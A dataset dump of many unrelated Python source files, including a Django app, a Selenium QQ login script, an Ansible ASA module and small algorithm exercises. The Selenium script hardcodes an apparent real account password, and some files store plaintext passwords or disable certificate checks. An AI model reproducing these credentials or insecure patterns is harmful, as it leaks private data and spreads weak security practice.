index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
22,400 | 3a51b33d6452d077678d8c3941302e0db9a1e4c3 | from django.contrib import admin
# Register your models here.
from django.contrib.auth.models import Group
from rest_framework.authtoken.models import Token
from user_app.models import User, ClientProfile, ConfirmationCode
admin.site.unregister(Group)
admin.site.unregister(Token)
class ClientInline(admin.StackedInline):
model = ClientProfile
extra = 1
class UserAdmin(admin.ModelAdmin):
model = User
list_display = ['username', 'user_type', 'last_login']
inlines = [ClientInline]
admin.site.register(User, UserAdmin)
admin.site.register(ConfirmationCode)
|
22,401 | 6b632aaad6d1f60380b5822fb6a8966435a53c31 | # -*- coding: utf-8 -*-
# 开发团队 :AI悦创
# 开发人员 :AI悦创
# 开发时间 :2019/8/27 22:29
# 文件名称 :qq_zone_test.PY
# 开发工具 :PyCharm
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import quote
from pyquery import PyQuery
import time
url = 'https://qzone.qq.com/'
browser = webdriver.Chrome()
wait = WebDriverWait(browser, 10)
def qqzone_login(url):
try:
browser.get(url)
# time.sleep(10)
log = wait.until(
EC.presence_of_element_located(
(By.CSS_SELECTOR, '#switcher_plogin')
)
)
log.click()
except:
qqzone_login(url)
print('Erroy')
# def get_products():
# html = browser.page_source
# doc = PyQuery(html)
# items = doc('#mainsrp-itemlist .m-itemlist .items .item').items()
# for index, item in enumerate(items):
# products = []
# image = item.find('.pic .img').attr('data-src')
# price = item.find('.price').text()
# deal = item.find('.deal-cnt').text()
# title = item.find('.title').text()
# products.append([image, price, deal, title])
# str_1 = f"{deal},>>>{title}"
# print(products)
# print(str_1)
# wile = f'l{index}.csv'
# with open(wile, 'wb') as f:
# f.write(str_1.encode())
def login(url):
# browser.get('https://s.taobao.com/search?q=iPad')
browser.get(url)
time.sleep(10)
browser.switch_to_frame('login_frame')
browser.find_element_by_id('img_out_1432803776').click()
user_name_input = browser.find_element_by_id('TPL_username_1')
user_name_input.clear()
user_name_input.send_keys('黄帝2810')
user_password_input = browser.find_element_by_id('TPL_password_1')
user_password_input.clear()
user_password_input.send_keys('Cleland18059572160')
time.sleep(3)
submit = browser.find_element_by_id('J_SubmitStatic')
# qqzone_login(url)
login(url) |
22,402 | 7daddb486ab4c2553a7fa6455ba88d7c57acae95 | class Solution:
"""
@param pattern: a string, denote pattern string
@param teststr: a string, denote matching string
@return: an boolean, denote whether the pattern string and the matching string match or not
"""
def wordPattern(self, pattern, teststr):
# write your code here
if not pattern and not teststr:
return True
if not pattern or not teststr:
return False
words = teststr.split(' ')
pattern_to_word = {}
word_to_pattern = {}
for i in range(len(pattern)):
p, w = pattern[i], words[i]
if p in pattern_to_word:
if pattern_to_word[p] == w:
continue
else:
return False
else:
if w in word_to_pattern and word_to_pattern[w] != p:
return False
pattern_to_word[p] = w
word_to_pattern[w] = p
return True
if __name__ == '__main__':
s = Solution()
word = "a dog dog a"
pattern = "abba"
print(s.wordPattern(pattern, word)) |
22,403 | e7be4b5b00928a15a5322d464d3590a38dfc1eec | /home/charlie/anaconda3/lib/python3.6/sre_constants.py |
22,404 | f580278886a2cc3ba7eaecb4fca3d135d2959b7e | import os
from opsbro.collector import Collector
if os.name == 'nt':
import opsbro.misc.wmi as wmi
class IIS(Collector):
def launch(self):
# logger.debug('getMemoryUsage: start')
if os.name != 'nt':
self.set_not_eligible('This collector is only available on Windows')
return False
if not self.is_in_group('iis-server'):
self.set_not_eligible('Please add the iis-server group to enable this collector.')
data = {}
counters = [
(r'iis total bytes/sec', r'\web service(_total)\bytes total/sec', 100),
(r'iis current connections', r'\web service(_total)\current connections', 0),
(r'asp.net total requests failed', r'\asp.net applications(__total__)\requests failed', 0),
(r'asp.net total requests/sec', r'\asp.net applications(__total__)\requests/sec', 100),
(r'asp.net total errors/sec', r'\asp.net applications(__total__)\errors total/sec', 100),
(r'asp.net total pipeline instance count', r'\asp.net applications(__total__)\pipeline instance count', 0),
(r'asp.net total sessions active', r'\asp.net applications(__total__)\sessions active', 0),
(r'asp.net requests queued', r'\asp.net\requests queued', 0),
]
for c in counters:
_label = c[0]
_query = c[1]
_delay = c[2]
try:
v = wmi.wmiaccess.get_perf_data(_query, unit='double', delay=_delay)
except WindowsError: # no such info
continue
data[_label] = v
return data
|
22,405 | 3b37514344eaaa5f9980ab1f08ccaffc5bf3247e | import json
import requests
from django.conf import settings
from mohawk import Sender
from barriers.models import Company
from utils.exceptions import APIHttpException, DataHubException
class DatahubClient:
def request(self, method, path, **kwargs):
if not settings.DATAHUB_URL:
raise DataHubException("DATAHUB_URL is not set")
url = f"{settings.DATAHUB_URL}{path}"
credentials = {
"id": settings.DATAHUB_HAWK_ID,
"key": settings.DATAHUB_HAWK_KEY,
"algorithm": "sha256",
}
sender = Sender(
credentials,
url,
method,
content=json.dumps(kwargs),
content_type="application/json",
always_hash_content=False,
)
headers = {"Authorization": sender.request_header}
response = getattr(requests, method)(
url, verify=not settings.DEBUG, headers=headers, json=kwargs
)
try:
response.raise_for_status()
except requests.exceptions.HTTPError as e:
raise APIHttpException(e)
return response.json()
def get(self, path, **kwargs):
return self.request("get", path, **kwargs)
def post(self, path, **kwargs):
return self.request("post", path, **kwargs)
def patch(self, path, **kwargs):
return self.request("patch", path, **kwargs)
def put(self, path, **kwargs):
return self.request("put", path, **kwargs)
def get_company(self, id):
path = f"/v4/public/company/{id}"
return Company(self.get(path))
def search_company(self, query, page=1, limit=20, **kwargs):
params = {
"original_query": query,
"offset": (page * limit) - limit,
"limit": limit,
}
path = "/v4/public/search/company"
data = self.post(path, **params)
return {
"count": data["count"],
"results": [Company(company) for company in data["results"]],
}
|
22,406 | 49bf5fe221f1b06238f43418f6c6b7421ce4fbbb | #
# Copyright (c) 2013, Prometheus Research, LLC
#
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from docutils.parsers.rst.directives.images import Figure
from sphinx.util.osutil import ensuredir
from subprocess import Popen, PIPE
import os, os.path, tempfile, shutil
from bdp.render import render_tikz
from hashlib import sha1 as sha
from shutil import copyfile
class BdpFigureDirective(Figure):
required_arguments = 0
has_content = True
option_spec = Figure.option_spec.copy()
option_spec['caption'] = directives.unchanged
def run(self):
self.arguments = ['']
text = '\n'.join(self.content)
try:
self.content[0] = self.options['caption']
while len(self.content) > 1:
self.content.trim_end(len(self.content) - 1)
except:
self.content = None
(figure_node,) = Figure.run(self)
if isinstance(figure_node, nodes.system_message):
return [figure_node]
figure_node.bdpfigure = text
return [figure_node]
class BdpFigureError(Exception):
pass
class bdpfigure(nodes.General, nodes.Element):
pass
def render_bdpfigure(app, filename, options):
directory = os.path.dirname(filename)
basename = os.path.basename(filename)
stem = os.path.splitext(basename)[0]
name = stem + '.pdf'
outdir = os.path.join(app.builder.outdir, '_bdpfigure')
try:
print(os.path.getmtime(filename))
print(os.path.getmtime(os.path.join(app.builder.outdir, name)))
if (os.path.getmtime(filename) <
os.path.getmtime(os.path.join(app.builder.outdir, name))):
print("Skipping:", filename)
return name
except FileNotFoundError:
pass
if not os.path.exists(outdir):
os.makedirs(outdir)
bdpinputs = [directory]
for bdpdir in app.env.config.bdpfigure_bdpinputs:
bdpdir = os.path.join(app.env.srcdir, bdpdir)
bdpinputs.append(bdpdir)
# bdpinputs.append('')
# bdpinputs = ':'.join(bdpinputs)
environ = os.environ.copy()
environ['TEXINPUTS'] = outdir + ':'
render_tikz(basename, outdir, bdpinputs)
cmdline = [app.env.config.bdpfigure_pdftex,
'-halt-on-error',
'-interaction', 'nonstopmode',
'-output-directory', outdir,
os.path.join(outdir, stem) + '.tex']
shell(cmdline, env=environ)
copyfile(os.path.join(outdir, stem) + '.pdf',
os.path.join(app.builder.outdir, name))
# cmdline = [app.env.config.bdpfigure_pdftoppm,
# '-r', str(app.env.config.bdpfigure_resolution),
# '-f', '1', '-l', '1',
# os.path.join(outdir, stem)+'.pdf',
# os.path.join(outdir, stem)]
# shell(cmdline)
# ppmfile = os.path.join(outdir, stem)+'-1.ppm'
# if not os.path.exists(ppmfile):
# raise BdpFigureError("file not found: %s" % ppmfile)
#
# data = open(ppmfile, 'rb').read()
# cmdline = [app.env.config.bdpfigure_pnmcrop]
# data = shell(cmdline, data)
# line = data.splitlines()[1]
# width, height = [int(chunk) for chunk in line.split()]
# cmdline = [app.env.config.bdpfigure_pnmtopng,
# '-transparent', 'white',
# '-compression', '9']
#
# data = shell(cmdline, data)
#
# open(os.path.join(app.builder.outdir, name), 'wb').write(data)
return name
def shell(cmdline, input=None, env=None):
try:
process = Popen(cmdline, stdin=PIPE, stdout=PIPE, stderr=PIPE, env=env)
except OSError as exc:
raise BdpFigureError("cannot start executable `%s`: %s"
% (' '.join(cmdline), exc))
output, error = process.communicate(input)
if process.returncode != 0:
if not error:
error = output
raise BdpFigureError("`%s` exited with an error:\n%s"
% (' '.join(cmdline), error))
return output
def visit_bdpfigure(self, node):
pass
def depart_bdpfigure(self, node):
pass
def get_hashid(text):
hashkey = text.encode('utf-8')
hashid = sha(hashkey).hexdigest()
return hashid
def render_bdp_images(app, doctree):
for fig in doctree.traverse(nodes.figure):
if hasattr(fig, 'bdpfigure'):
text = fig.bdpfigure
hashid = get_hashid(text)
fname = 'plot-%s' % (hashid)
if os.path.exists(os.path.join(app.builder.outdir, fname) + '.pdf'):
continue
outdir = os.path.join(app.builder.outdir, '_bdpfigure')
if not os.path.exists(outdir):
os.makedirs(outdir)
filename = os.path.join(outdir, fname + '.py')
with open(filename, 'wb') as f:
f.write("from bdp.node import *\n\n".encode())
f.write(text.encode())
else:
try:
image=fig.children[0]
filename = image['uri']
basename = os.path.basename(filename)
extension = os.path.splitext(basename)[1]
if (extension != '.py'):
continue
env = app.env
docdir = os.path.dirname(env.doc2path(env.docname, base=None))
if filename.startswith('/'):
filename = os.path.normpath(filename[1:])
else:
filename = os.path.normpath(os.path.join(docdir, filename))
env.note_dependency(filename)
filename = os.path.join(env.srcdir, filename)
except:
continue
# try:
print(filename)
fname = render_bdpfigure(app, filename, fig)
print(fname)
image=fig.children[0]
image['uri'] = fname
# except BdpFigureError as exc:
# app.builder.warn('gnuplot error: ' + str(exc))
# fig.replace_self(nodes.literal_block(text, text))
# continue
def setup(app):
app.add_config_value('bdpfigure_pdftex', 'pdflatex', 'env')
app.add_config_value('bdpfigure_pdftoppm', 'pdftoppm', 'env')
app.add_config_value('bdpfigure_pnmcrop', 'pnmcrop', 'env')
app.add_config_value('bdpfigure_pnmtopng', 'pnmtopng', 'env')
app.add_config_value('bdpfigure_bdpinputs', [], 'env')
app.add_config_value('bdpfigure_resolution', 256, 'env')
app.connect('doctree-read', render_bdp_images)
app.add_directive('bdpfigure', BdpFigureDirective)
# app.add_node(bdpfigure,
# latex=(visit_bdpfigure, depart_bdpfigure)) |
22,407 | 5bb1a621dd9343d809f2405f0970dbf351ece123 | #!/usr/bin/env python2.7
# Copyright (c) 2017 Sybil Melton, Dominion Enterprises
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Extends RASA module written by Patrick Ogenstad <patrick@ogenstad.com> https://github.com/networklore/rasa
DOCUMENTATION = '''
---
module: asa_rest_networkobject
short_description: Log in to an ASA with REST API
description:
- Offers ability to log in to an ASA with the REST API and retrieve serial number to verify connectivity and functionality
author: Sybil Melton
requirements:
- ASA REST 1.3
options:
type:
description:
- The type of object you are creating. Use slash notation for subnets, i.e. 192.168.0.0/24. Use - for ranges, i.e. 192.168.0.1-192.168.0.10.
choices: [ 'ipv4_address', 'ipv6_address', 'ipv4_subnet', 'ipv6_subnet', 'ipv4_range', 'ipv6_range', 'ipv4_fqdn', 'ipv6_fqdn' ]
required: false
description:
description:
- Description of the object
required: false
host:
description:
- IP or hostname of the ASA
required: true
name:
description:
- Name of the network object
required: true
password:
description:
- Password for the device
required: true
state:
description:
- State of the object
choices: [ 'present', 'absent' ]
required: true
username:
description:
- Username for device
required: true
validate_certs:
description:
- If False, SSL certificates will not be validated. This should only be used on personally controlled sites using self-signed certificates.
choices: [ True, False]
default: True
required: false
value:
description:
- The data to enter into the network object
required: false
'''
EXAMPLES = '''
- asa_rest_networkobject:
host={{ ansible_host }}
username=api_user
password=APIpass123
name=WEB1_10.12.30.10
state=present
type=ipv4_address
description='Test web server'
value='10.12.30.10'
validate_certs=False
- asa_rest_networkobject:
host={{ ansible_host }}
username=api_user
password=APIpass123
name=WEB1_10.12.30.10
state=absent
validate_certs=False
'''
RETURN = '''
changed:
description: Returns the status code
returned: True
type: string
sample: true
result:
description: Returns the json
returned: True
type: string
sample: "result": { "kind": "object#QuerySerialNumber", "serialNumber": "9AFMQXLC3TS"}
'''
import urllib3
import logging
from ansible.module_utils.basic import *
import requests
import json
import sys
from requests.auth import HTTPBasicAuth
requests.packages.urllib3.disable_warnings()
HEADERS = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'ANSIBLE'
}
object_kind = {
'ipv4_address': 'IPv4Address',
'ipv6_address': 'IPv6Address',
'ipv4_subnet': 'IPv4Network',
'ipv6_subnet': 'IPv6Network',
'ipv4_range': 'IPv4Range',
'ipv6_range': 'IPv6Range',
'ipv4_fqdn': 'IPv4FQDN',
'ipv6_fqdn': 'IPv6FQDN'
}
class ASA(object):
def __init__(self, device=None, username=None, password=None, verify_cert=True, timeout=5):
self.device = device
self.username = username
self.password = password
self.verify_cert = verify_cert
self.timeout = timeout
self.cred = HTTPBasicAuth(self.username, self.password)
######################################################################
# General Functions
######################################################################
def _delete(self, request):
url = 'https://' + self.device + '/api/' + request
data = requests.delete(url,headers=HEADERS,auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
return data
def _get(self, request):
url = 'https://' + self.device + '/api/' + request
data = requests.get(url,headers=HEADERS,auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
return data
def _patch(self, request, data):
url = 'https://' + self.device + '/api/' + request
data = requests.patch(url, data=json.dumps(data), headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
return data
def _post(self, request, data=False):
url = 'https://' + self.device + '/api/' + request
if data != False:
data = requests.post(url, data=json.dumps(data), headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
else:
data = requests.post(url, headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
return data
def _put(self, request, data):
url = 'https://' + self.device + '/api/' + request
data = requests.put(url, data=json.dumps(data), headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
return data
######################################################################
# <OBJECTS>
######################################################################
# Functions related to network objects, or "object network" in the
# ASA configuration
######################################################################
def create_networkobject(self, data):
request = 'objects/networkobjects'
return self._post(request, data)
def delete_networkobject(self, net_object):
request = 'objects/networkobjects/' + net_object
return self._delete(request)
def get_networkobject(self, net_object):
request = 'objects/networkobjects/' + net_object
return self._get(request)
def get_networkobjects(self):
request = 'objects/networkobjects'
return self._get(request)
#def get_networkservices(self):
# request = 'objects/predefinednetworkservices'
# return self._get(request)
def update_networkobject(self, name, data):
request = 'objects/networkobjects/' + name
return self._put(request, data)
######################################################################
# Functions related to specific commands
######################################################################
def write_mem(self):
"""Saves the running configuration to memory
"""
request = 'commands/writemem'
return self._post(request)
urllib3.disable_warnings()
logging.captureWarnings(True)
def match_objects(current_data, desired_data, module):
has_current_desc = False
has_desired_desc = False
if 'description' in current_data.keys():
has_current_desc = True
if 'description' in desired_data.keys():
has_desired_desc = True
if has_current_desc == has_desired_desc:
if has_desired_desc == True:
if current_data['description'] != desired_data['description']:
return False
else:
return False
if current_data['host'] != desired_data['host']:
return False
return True
def update_object(dev, module, desired_data):
try:
before = dev.get_networkobject(desired_data['name'])
result = dev.update_networkobject(desired_data['name'], desired_data)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code == 204:
data = dev.get_networkobject(desired_data['name'])
return_status = { 'changed': True, 'previous': before.json(), 'result': data.json() }
else:
module.fail_json(msg='Unable to update object code: - %s' % result.status_code)
return return_status
def create_object(dev, module, desired_data):
try:
result = dev.create_networkobject(desired_data)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code == 201:
data = dev.get_networkobject(desired_data['name'])
return_status = { 'changed': True, 'result': data.json() }
else:
module.fail_json(msg='Unable to create object - %s' % result.status_code)
return return_status
def delete_object(dev, module, name):
try:
before = dev.get_networkobject(name)
result = dev.delete_networkobject(name)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if result.status_code == 204:
return_status = { 'previous': before.json(), 'changed': True }
else:
module.fail_json(msg='Unable to delete object - %s' % result.status_code)
return return_status
def main():
module = AnsibleModule(
argument_spec=dict(
host=dict(required=True),
username=dict(required=True),
password=dict(required=True),
validate_certs=dict(required=False, choices=[True, False], default=True),
provider=dict(required=False),
name=dict(required=True),
description=dict(required=False),
state=dict(required=True, choices=['absent', 'present']),
type=dict(required=False, choices=[ 'ipv4_address', 'ipv6_address', 'ipv4_subnet', 'ipv6_subnet', 'ipv4_range', 'ipv6_range', 'ipv4_fqdn', 'ipv6_fqdn' ]),
value=dict(required=False)),
required_together = ( ['type','value'],
),
supports_check_mode=False
)
name = module.params['name']
objectId = module.params['name']
type = module.params['type']
value = module.params['value']
state = module.params['state']
if state == "present":
if type == False:
module.fail_json(msg='Category not defined')
dev = ASA(
username = module.params['username'],
password = module.params['password'],
device = module.params['host'],
verify_cert = module.params['validate_certs']
)
desired_data = {}
desired_data['name'] = name
desired_data['objectId'] = objectId
desired_data['kind'] = 'object#NetworkObj'
if type:
kind = object_kind[type]
desired_data['host'] = {
'kind': kind,
'value': value
}
if module.params['description']:
desired_data['description'] = module.params['description']
try:
data = dev.get_networkobject(name)
except:
err = sys.exc_info()[0]
module.fail_json(msg='Unable to connect to device: %s' % err)
if data.status_code == 200:
if state == 'absent':
changed_status = delete_object(dev, module, name)
elif state == 'present':
matched = match_objects(data.json(), desired_data, module)
if matched:
changed_status = {'changed': False, 'result': data.json()}
else:
changed_status = update_object(dev, module, desired_data)
elif data.status_code == 401:
module.fail_json(msg='Authentication error')
elif data.status_code == 404:
if state == 'absent':
changed_status = {'changed': False, 'result': data.json()}
elif state == 'present':
changed_status = create_object(dev, module, desired_data)
else:
module.fail_json(msg="Unsupported return code %s" % data.status_code)
module.exit_json(**changed_status)
main()
|
22,408 | f0a071c42b74950b189d91620577e8deb55aae92 | from django import forms
from django.shortcuts import render_to_response
from django.http import HttpResponse, HttpResponseRedirect
from record.models import User, IssueType, IssueRecord
from record.form import UserForm
def regist(req):
if req.method == 'POST':
uf = UserForm(req.POST)
if uf.is_valid():
username = uf.cleaned_data['username']
password = uf.cleaned_data['password']
User.objects.create(username = username, password = password)
return HttpResponseRedirect('/login/')
else:
uf = UserForm()
return render_to_response('regist.html', {'uf':uf})
def login(req):
if req.method == 'POST':
uf = UserForm(req.POST)
if uf.is_valid():
username = uf.cleaned_data['username']
password = uf.cleaned_data['password']
user = User.objects.filter(username__exact = username, password__exact = password)
if user:
req.session['username'] = username
# read issue type from db
issue = IssueType.objects.all()
#return HttpResponseRedirect('/index/', {'issue':issue})
return render_to_response('index.html', {'issue':issue})
else:
return HttpResponseRedirect('/login/')
else:
uf = UserForm()
return render_to_response('login.html', {'uf':uf})
def index(req):
username = req.session.get('username', 'anybody')
return render_to_response('index.html', {'username':username})
def logout(req):
session = req.session.get('username', False)
if session:
del req.session['username']
return render_to_response('logout.html', {'username':session})
else:
return HttpResponse('please login!')
def search_form(request):
return render_to_response('search_form.html')
def search(request):
if 'q' in request.GET and request.GET['q']:
q = request.GET['q']
issueRecord = IssueRecord.objects.filter(issueName__icontains = q)
return render_to_response('search_results.html', {'issueRecord':issueRecord})
else:
return HttpResponse('search_form.html', {'error':True})
|
22,409 | e4984229d3cbf0c0e0e2c11cd29809e6bb531df0 | N = int(input())
s = []
Sum = 0
for i in range(N):
s.append(int(input()))
Sum += s[i]
s.sort()
if Sum % 10 != 0:
print(Sum)
else:
for i in range(N):
if s[i] % 10 != 0:
print(Sum - s[i])
break
if i == N - 1:
print(0) |
22,410 | 82d7377c9103a531a0a332dd65d549a06325716b | import nltk
from nltk.corpus import genesis
# from nltk.corpus import gutenberg
from nltk.corpus import stopwords
print(genesis.fileids())
# print(gutenberg.fileids())
genesis_book = genesis.raw('english-kjv.txt')
# bible = gutenberg.raw('bible-kjv.txt')
# tokenized_bible = nltk.tokenize.word_tokenize(bible)
tokenized_genesis = nltk.tokenize.word_tokenize(genesis_book)
# print(len(tokenized_bible))
print(len(tokenized_genesis))
stop_words = set(stopwords.words("english"))
tokenized_genesis_nostop = [x for x in tokenized_genesis if not x in stop_words]
print(len(tokenized_genesis_nostop))
# print(len(tokenized_genesis))
print(tokenized_genesis)
print(tokenized_genesis_nostop)
|
22,411 | 504cd79ae6a8beb3440f990273ab29876865b9a6 | import matplotlib.pyplot as plt
import numpy as np
def main():
points = np.array([
[2, 2],
[1, 1],
[3, 4],
[5, 2],
[6, 3],
[2, 5],
[2, 6],
[5, 4],
[4, 3],
])
convex_hull = gift_wrapping_algorithm(points)
fig, ax = plt.subplots()
ax.scatter(points[:,0], points[:,1], label='points')
ax.plot(convex_hull[:,0], convex_hull[:,1], color='C1', label='convex hull')
ax.set_xlabel('$x$')
ax.set_ylabel('$y$')
ax.set_title('The 2D convex hull for set of points.')
ax.legend()
plt.savefig('convex_hull.png')
def orientation(p0, p1, p2):
"""
Returns 0 if points are co-linear, 1 if clockwise, -1 if counterclockwise.
"""
angle = (p1[1] - p0[1])*(p2[0] - p1[0]) - (p2[1] - p1[1])*(p1[0] - p0[0])
if angle == 0.0:
return 0
elif angle < 0.0:
return -1
elif angle > 0.0:
return 1
def gift_wrapping_algorithm(points):
print(f'gift_wrapping_algorithm() called with points = {points}')
# Find left-most point to start
x_vals = points[:, 0]
y_vals = points[:, 1]
x_min_idxs = np.argmin(x_vals)
# breakpoint()
# Pick left-most point, guaranteed to be in convex-hull
left_point = [ x_vals[x_min_idxs], y_vals[x_min_idxs] ]
convex_hull = []
convex_hull.append(left_point)
while(True):
print(f'Performing iteration...')
# Make sure we haven't picked the same point twice
next_point = points[0].tolist()
if np.array_equal(convex_hull[-1], next_point):
next_point = points[1].tolist()
print(f'Next point = {next_point}')
for point in points:
angle = orientation(convex_hull[-1], next_point, point)
if angle == -1:
print(f'Found a more counter-clockwise point! Point = {point}')
next_point = point.tolist()
convex_hull.append(next_point)
if np.array_equal(convex_hull[-1], convex_hull[0]):
print(f'Back at start!')
break
print(f'convex_hull = {convex_hull}')
# Convert to array and return
return np.array(convex_hull)
if __name__ == '__main__':
main() |
22,412 | 176c98ffff8310d4ab3cfaaf0aeacbf83206f627 | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 26 14:04:25 2016
@author: zach
"""
from Measurement import Measurement
import os
class Recipe:
def __init__(self, name, OD, ID, wall, concent, oval):
self.Name = name
self.outerDiameter = OD
self.innerDiameter = ID
self.Wall = wall
self.Concentricity = concent
self.Ovality = oval
def getOD(self):
return self.outerDiameter
def setOD(self, newOD):
self.outerDiameter = newOD
def getID(self):
return self.innerDiameter
def setID(self, newID):
self.innerDiameter = newID
def getWall(self):
return self.Wall
def setWall(self, newWall):
self.Wall = newWall
def getConc(self):
return self.Concentricity
def setConc(self, newConc):
self.Concentricity = newConc
def getOvality(self):
return self.Ovality
def setOvality(self, newOval):
self.Ovality = newOval
def printRecipe(self):
# Print the recipe in a controlled manner
print("")
def readRecipe(self):
# Read a file and construct the recipe from the contents
print("")
def writeRecipe(self,out_file_name,x):
if x == 0:
os.remove(out_file_name)
try:
out_file = open(out_file_name, 'a');
out_file.write( self.Name +"\n")
out_file.write( self.outerDiameter +"\n")
out_file.write( self.innerDiameter +"\n")
out_file.write( self.Wall +"\n")
out_file.write( self.Concentricity +"\n")
out_file.write( self.Ovality +"\n")
except:
print("File open did not work")
out_file.close()
|
22,413 | d1f19e8cdb23a7d3de8cff3a5706c0b12d0f11b0 | import socket
import time
host = "localhost"
port = 3128
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen(5)
print("Servidor iniciado em: ", time.ctime(),"Na porta -> ", host, ":", port)
while True:
conn, end = server.accept()
print("Server conectado por: ", end)
while True:
data = conn.recv(1024)
if not data: break
conn.send(b'Echo=>' + data)
|
22,414 | a9849e5ee7d0b878ebc33dd499778b275cca1569 | """empty message
Revision ID: 85bda85aeecc
Revises: 2c5d45cff580
Create Date: 2021-09-07 21:58:55.324142
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '85bda85aeecc'
down_revision = '2c5d45cff580'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('audit_database',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('row_id', sa.BigInteger(), nullable=True),
sa.Column('table_name', sa.String(), nullable=True),
sa.Column('action', sa.String(), nullable=True),
sa.Column('user', sa.String(), nullable=True),
sa.Column('date_hour', sa.DateTime(), nullable=True),
sa.Column('row', postgresql.JSON(astext_type=sa.Text()), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('audit_request',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('ip', sa.String(), nullable=True),
sa.Column('url', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.add_column('item', sa.Column('modified_by', sa.String(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('item', 'modified_by')
op.drop_table('audit_request')
op.drop_table('audit_database')
# ### end Alembic commands ###
|
22,415 | a6862d967ef818cb97e52472cc84f07938f4e8bf | import os
import time
import threading
import datetime
import psutil
from check_bricap import *
from logger import logger
import cfg
__author__ = "Paulo/Giovanne"
__copyright__ = "Copyright 2019, Brascontrol"
__status__ = "Development"
#Cria thread
class MainClass(threading.Thread):
def __init__(self):
self.die = False
threading.Thread.__init__(self)
#Verifica se algum processo está rodando
def verificaSeRodaProcesso(self,nomeProcesso):
for proc in psutil.process_iter():
try:
if nomeProcesso.lower() in proc.name().lower():
return True
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return False
#Verifica se txi está rodando
def verificaRun(self):
file = os.path.exists("/var/run/txi/txi.pid")
if not file:
os.system('/home/bri7000/bricap/txi &')
def run(self):
while not self.die:
self.verificaRun()
logger.info(' >>>> Verificando bricapd')
if self.verificaSeRodaProcesso('bricapd'):
logger.debug(' >>>> bricapd está rodando no momento')
else:
logger.debug(' >>>> bricapd não está rodando \n >>>> Iniciando bricapd')
os.system('/home/bri7000/bricap/bricapd &')
time.sleep(11)
def join(self):
logger.debug("\n >>>> Ocorreu falha ao executar Thread")
super().join()
def leArquivo():
f = open('/var/run/txi/tx.txi','r')
arquivo = int(f.read())
f.close()
return arquivo
def verificaTempo():
arquivoAntigo = leArquivo()
time.sleep(cfg.TEMPO_MAX_TXI)
arquivoNovo = leArquivo()
if arquivoAntigo == arquivoNovo:
return False
else:
return True
def main():
verificaTxi= MainClass()
verificaBri = SecondClass()
verificaBri.start()
verificaTxi.start()
while True:
ctempo= str(datetime.timedelta(seconds=cfg.TEMPO_MAX_TXI))
logger.info(' >>>> Vericando a cada ' + ctempo )
teste = verificaTempo()
if not teste:
logger.info(' >>>> REINICIANDO TXI (pid=%d)\n', os.getpid() )
os.system('killall txi')
if __name__ == "__main__":
main() |
22,416 | 71ac4473647215f159fb8b540fccb96a6844d97a |
import tempfile
import numpy as np
import matplotlib.pyplot as plt
plt.ioff()
import ss_timing.conf
import ss_timing.data
import ss_timing.exp
def run():
conf = ss_timing.conf.get_conf("practice")
data = ss_timing.data.gen_data_table(conf)
# pull out the trials for this run
i_this_run = (data["run_number"] == 1)
run_data = data[i_this_run]
run_data["surr_contrast"] = 0.0
# perform the run
run_data = ss_timing.exp._run(
conf,
run_data,
wait_to_start=True,
wait_at_end=False,
show_finish=False
)
temp = tempfile.NamedTemporaryFile(delete=False)
ss_timing.data.save_data(
conf,
run_data,
temp.name
)
print "Saved practice data to " + temp.name
plot(conf, run_data)
return run_data
def plot_from_file(path):
conf = ss_timing.conf.get_conf("practice")
data = ss_timing.data.load_data(conf, path)
plot(conf, data)
def plot(conf, data):
fig = plt.figure()
fine_x = np.logspace(np.log10(0.001), np.log10(0.5), 100)
n_bins = 20
bins = np.logspace(
np.log10(0.001),
np.log10(0.5),
n_bins
)
for i_stair in xrange(conf.n_stairs_per_run):
ax = plt.subplot(1, 2, i_stair + 1)
stair_data = data[data["stair_num"] == i_stair + 1]
contrasts = stair_data["target_contrast"]
corrects = stair_data["correct"]
i_bins = np.digitize(contrasts, bins)
resp_data = np.empty((n_bins, 4))
resp_data.fill(np.NAN)
for i_bin in xrange(n_bins):
in_bin = (i_bins == i_bin)
total = np.sum(in_bin)
count = np.sum(corrects[in_bin])
try:
p = float(count) / float(total)
except ZeroDivisionError:
p = 0.0
resp_data[i_bin, 0] = bins[i_bin]
resp_data[i_bin, 1] = p
resp_data[i_bin, 2] = count
resp_data[i_bin, 3] = total
ax.scatter(
resp_data[:, 0],
resp_data[:, 1],
s=resp_data[:, 3] * 3
)
fine_y = conf.psych_func(
x=fine_x,
alpha=stair_data["alpha_hat"][-1],
beta=stair_data["beta_hat"][-1]
)
ax.plot(fine_x, fine_y)
ax.set_xscale("log")
ax.set_ylim([-0.05, 1.05])
plt.show()
|
22,417 | ad558f05c7e2c461e3dc979b74a8a02635ebadf0 | # -*- coding: utf-8 -*-
